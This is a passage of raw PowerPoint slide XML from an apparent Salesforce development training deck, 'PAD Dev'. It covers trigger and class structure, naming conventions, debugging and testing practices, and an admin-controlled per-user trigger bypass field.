            <a:ext cx="8035925" cy="22860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&lt;PAD/DEV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Presentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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&lt;PAD Dev – Introduction&gt;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1447800"/>
            <a:ext cx="8177212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Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Being able </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>to code based only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>the PAD Spec document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Respect best practices, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>norms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and conventions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>compatible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with other development </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>under construction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Facilitate maintenance by developing like any other developer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on the same project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>From customer to customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t reinvent the wheel, take the best of the breed.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9538" y="685800"/>
            <a:ext cx="141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 rot="5400000" flipV="1">
            <a:off x="7136607" y="-615157"/>
            <a:ext cx="381000" cy="2220913"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60000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21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6718300" y="869950"/>
            <a:ext cx="1011238" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49921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22"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7474507" y="922894"/>
            <a:ext cx="209550" cy="1716561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04800"/>
            <a:ext cx="488004" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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38200"/>
            <a:ext cx="488004" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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143000"/>
            <a:ext cx="488004" cy="533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8229600" cy="1096963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0"/>
              <a:t>&lt;PAD - Norms&gt;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1524000"/>
            <a:ext cx="8177212" cy="4800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400" dirty="0" smtClean="0"/>
              <a:t>Triggers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Classes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b="1" dirty="0" smtClean="0"/>
              <a:t>One trigger per event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000" dirty="0" smtClean="0"/>
              <a:t>Note : if you create multiple triggers per event on the same object, how will you manage the code execution order ?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one before insert, one before update, not one for both)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You will see through the app all events for any object without diving in the code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Deactivation system (see later) will be mutualized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Develop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>conditions in triggers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In one event, you will identify any class being called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Develop the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> if the condition is true </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>in classes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No impact for other developers when the code is under development as they will either not go through the condition, or they can disable classes for themselves (see following slides)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No impact of other development on code coverage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One or more methods in classes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Identify governor limit usage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Put it in the first comment lines of the class, this will make easy any impact evaluation when adding new Apex Code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1000" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Test.startTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>(); and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Test.stopTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>(); to identify this without taking into account any usage of the test method preparation.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As Class code can trigger other triggers, add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>System.Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>() comment at the beginning and the end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>of each method; you will be able to identify easily what part of the code is behaving well or not</a:t>
            </a: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3276600" y="152400"/>
            <a:ext cx="1143000" cy="11430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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Contact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Opportunity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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3505200" y="14478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SObject</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p: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4876800" y="1447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Event</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p: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5867400" y="14478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Trigger</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/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7315200" y="146208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/>
              <a:t>Class &amp; methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16393" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="152400"/>
            <a:ext cx="1066800" cy="11430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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>Before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>After</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>undelete</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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5638800" y="152400"/>
            <a:ext cx="14478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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>AccountBeforeInsert.trigger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1"/>
              <a:t>ContactBeforeDelete.trigger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>…</a:t>
            </a:r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5638800" y="762000"/>
            <a:ext cx="14478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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>Conditions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7162800" y="152400"/>
            <a:ext cx="1828800" cy="11430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Tx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>AP01Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>verifyDeletionRights()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>testAP01()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800"/>
              <a:t>AP23Contact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="80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&lt;PAD - Naming Convention&gt;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914400"/>
            <a:ext cx="7720012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050" dirty="0" smtClean="0"/>
              <a:t>Triggers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[Object Name][Event]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Ex : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>OpportunityBeforeInsert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>Classes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Called from triggers : AP[reference][object]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Ex : public class AP01Opportunity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Using reference makes easy to find corresponding design documents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Controllers :VFC[reference]_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>PageName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> or Ctrl[reference]_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>PageName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err="1" smtClean="0"/>
              <a:t>WebServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> : WS[reference]_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>ServiceName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err="1" smtClean="0"/>
              <a:t>EmailService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>emailSvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>[usage]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Test Classes : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>Test_[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>ClassName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>]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Methods : functional name (sub process)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Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
              <a:t>LegitimateOpportunityOwners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/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Test methods : test[name of the tested class method][event]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Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
              <a:t>testLegitimateOpportunityOwnersInsert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>Debugs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Prefix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>System.Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>() outputs with ‘##’, you will visually find them quicker when analyzing debug logs.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Put ‘######’ (or longer one) when catching an error through a try..catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>()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800" dirty="0" smtClean="0"/>
              <a:t>But don’t leave unmanaged “catch()” that will hide errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>Page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Wizard: VFP[reference][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>ProcessName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>StepNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>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err="1" smtClean="0"/>
              <a:t>VisualEmailTemplate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>EmailTemplate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>[reference][Name]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Other pages : VFP[reference]_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>PageName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Salesforce Site : depends on the SEO Strategy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>Components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C[reference]_Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103426" name="AutoShape 2" descr="https://clg.portalxm.com/vault/2440/editor/Image/braithwaite_norms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0"/>
            <a:ext cx="32861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&lt;PAD – Developing&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="7924800" cy="4800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Use latest version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>Salesforce IDE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Eclipse SDK + Eclipse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>ToolKit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="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Always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>retrieve updated code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>before creating a new one (refresh from server)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sz="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Avoid pushing your local code to the server (when synchronizing) except for the classes you are developing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>yourself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sz="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Announce the team or the development coordinator when updating a trigger, to avoid conflict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This is the only part where you could have conflict in PAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="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Test Coverage your code through the test button of your class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/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NOT using the “run all tests” button. You should have the right coverage with your own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Manage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>performance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> for your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>testMethods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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To reduce deployment duration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smtClean="0"/>
              <a:t>Leverage the @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>testSetup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> annotation in your test classes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200" dirty="0" err="1" smtClean="0"/>
              <a:t>Bulkify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> test methods and define the loop iterations in a custom label</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0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57200" y="990600"/>
            <a:ext cx="81772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139489" tIns="69745" rIns="139489" bIns="69745"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GB" sz="1200">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18442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0"/>
            <a:ext cx="2854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9538" y="685800"/>
            <a:ext cx="141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2" name="AutoShape 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="7136607" y="-615157"/>
            <a:ext cx="381000" cy="2220913"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60000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1"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6718300" y="869950"/>
            <a:ext cx="1011238" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49921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7474507" y="922894"/>
            <a:ext cx="209550" cy="1716561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5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04800"/>
            <a:ext cx="488004" cy="533400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38200"/>
            <a:ext cx="488004" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17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143000"/>
            <a:ext cx="488004" cy="53340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4775496" y="5254823"/>
            <a:ext cx="3530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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>testSetup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>methodName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>() { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>..}</a:t>
            </a:r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&lt;PAD – Deactivation system and Framework&gt;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914400"/>
            <a:ext cx="8177212" cy="4876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200" dirty="0" smtClean="0"/>
              <a:t>Context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For many reasons (during development, or for interface users) you need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>deactivate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> a specific trigger usage (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
              <a:t>part of a trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>).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You can’t deactivate the trigger because other users require it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>running : different behavior per user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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You can’t hard-code users that will not go through the trigger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Solution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Define a multi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>picklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> field on the User object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err="1" smtClean="0"/>
              <a:t>PAD_BypassTrigger__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900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Make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>this field </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
              <a:t>readonly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t> for any user who is not able to manage users.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Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>one entry per functional class method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If the entry is selected for the current user and for the class that have to be tested, don’t call the class method and don’t go through condition testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
